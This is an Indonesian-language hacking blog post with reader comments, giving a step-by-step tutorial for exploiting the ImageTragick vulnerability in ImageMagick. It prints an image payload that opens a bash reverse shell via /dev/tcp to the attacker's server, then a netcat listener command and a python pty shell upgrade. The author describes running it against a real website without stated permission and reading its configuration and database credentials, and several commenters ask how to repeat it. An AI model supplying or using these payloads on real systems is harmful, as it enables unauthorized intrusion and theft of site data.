• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

Reverse Shell From ImageTragick Exploitation

July 21, 2016 by Jack Wilder 15 Comments

Hmm.. sebenarnya exploit ini sudah booming sekitar tigabulan yang lalu. Namun beberapa hari kemarin kembali rame ketika orang orang share berita tentang mas Herdian Nugraha yang mendapatkan 25juta ruplah dari Tokopedia dan Bukalapak karena menemukan bug ini di situs mereka. Saya pun penasaran dan setelah kemarin ada yang meretas 1CAK, saya mencoba exploit tersebut di situs 1CAK.com ternyata sukses ( sekarang bug nya juga sudah di patch ). Lalu bagaimana sebenarnya langkah langkah exploit ini ?

ImageMagick sendiri adalah sebuah perangkat lunak grafis yang gratis. Kemampuannya antara lain mampu membuat, memodifikasi dan menampilkan gambar-gambar bitmap serta mampu membaca, melakukan konversi dan menulis ke dalam berbagai format gambar yang berbeda.
Oke langsung saja ke langkah langkahnya. Disini saya harap kalian sudah menyiapkan vps atau bisa juga ip statis karena akan kita gunakan untuk mendapatkan reverse shell.
Sekarang kita buat sebuah file dengan isi berikut :

push graphic-context
viewbox 0 0 840 780
fill ‘url(https://127.0.0.0/oops.jpg”; bash -i >&
/dev/tcp/198.23.158.687/6969 0>&1; touch “hello)’
pop graphic-context

Karena 1cak hanya mengijinkan file bertipe jpg dan png, maka save file tersebut dengan format jpg/png. Sesuaikan juga ip dan port listening nya.
Selanjutnya dari vps kita masukkan command berikut :

nc -lvp 6969

Lalu upload file payload yang kita buat sebelumnya. Dalam kasus ini saya mencoba mengupload melalui fitur upload meme di 1cak.
Saya mendapatkan error berikut :
Namun disaat yang sama kita sudah mendpatkan akses shell interaktif di vps kita.
Saya mencoba membaca file konfigurasi di direktori inc dan login database. Ternyata bisa juga.
Nah sampai disini saja tutorialnya kalo diterusin malah jadi ngajarin yang engga engga.
Nb :
Untuk mendapatkan tampilan bash interaktif yang lebih menarik masukkan perintah berikut :

python -c “import pty; pty.spawn(‘/bin/bash’)”

Oke sekian tutorial kali ini, semoga bermanfaat.

Filed Under: Uncategorized Tagged With: Exploit, Hacking

Reader Interactions

Comments

  1. David says

    July 21, 2016 at 8:16 am

    Radiokaltara? Cara numpang servernya gimana gan ? Cari vps yg gratisan susah gan :v

    Reply
  2. Android Gaming69 says

    July 21, 2016 at 1:19 pm

    Mantapz :v

    Reply
  3. Firmansyah R. Ambarak says

    July 21, 2016 at 2:40 pm

    198.23.121.1337 <~ berhasil pake ip itu? tipo kalik yak gan 😀
    Btw, cara herdian pake vps?

    Reply
  4. Hanarki ID says

    July 22, 2016 at 6:47 am

    btw ente pake linux apa bro ?

    Reply
    • chiaki says

      July 22, 2016 at 10:55 am

      ubuntu

      Reply
  5. Zaini Zaina Zainu says

    July 22, 2016 at 5:00 pm

    Exploit.linuxsec.org dan linuxsec.org apakah kedua blog itu milik sampeyan semua gan?http://www.linuxsec.org/2016/07/how-i-got-763-reward-from-1cakcom.html

    Reply
    • chiaki says

      July 30, 2016 at 12:48 pm

      iya

      Reply
  6. Dwiky Juliyansyahh says

    January 17, 2017 at 12:40 pm

    Gan Bahan Bahannya Apa aja , dan apa harus pake linux? makasih

    Reply
  7. X 7 says

    June 29, 2017 at 4:40 pm

    Bang minta kontak biar bisa ngobrol

    Reply
  8. Yus says

    October 1, 2017 at 3:13 am

    bang kok ane gk bisa ya?

    Reply
  9. ./0px says

    October 21, 2017 at 8:25 am

    bingung pas di langkah membuat file itu pake notepad > save ke .jpg apa kudu pake image magicnya??
    klo iya brti harus install atau gimana image magicnya > kali lunux.

    Reply
  10. Abdi Prawira says

    February 17, 2018 at 12:02 pm

    jos, coba coba laa xD

    Reply
  11. Nano says

    November 3, 2018 at 4:57 pm

    semua server bisa apa gak bang? mungkin ga tp mksdnya klo kayak bypass admin gtu trs gabisa upload shell , trs dicoba pake exploit ini kira2 bisa ga ya bang?

    Reply
  12. Bahar Simth says

    February 15, 2019 at 4:52 pm

    Ga semua server bisa, hanya server yg menggunakan imagemagick yg msh bug aja, dan itupun klo ga di filter by mime waktu uploadnya

    Reply
  13. ryska says

    September 27, 2021 at 11:45 am

    fill ‘url(https://127.0.0.0/oops.jpg kalau maksudini apa ya pnjelasannya bang

    Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

Cracking FTP Password using Hydra on BackBox Linux

CVE-2019-13360 – CentOS Control Web Panel Authentication Bypass

Woocommerce Custom Tshirt Desginer CSRF Shell Upload Vulnerability

WordPress Fraction Theme Version 1.1.1 Privilege Escalation

Cara Mudah Hack cPanel dengan Fitur Reset Password

FastMail Custom Domain or Subdomain Takeover

Reverse Shell From Local File Inclusion Exploit

Readme.io Custom Domain or Subdomain Takeover

Heroku Custom Domain or Subdomain Takeover

Deface WordPress dengan Exploit Themes Qualifire File Upload Vulnerability

LinuxSec / 14 queries in 0.10 seconds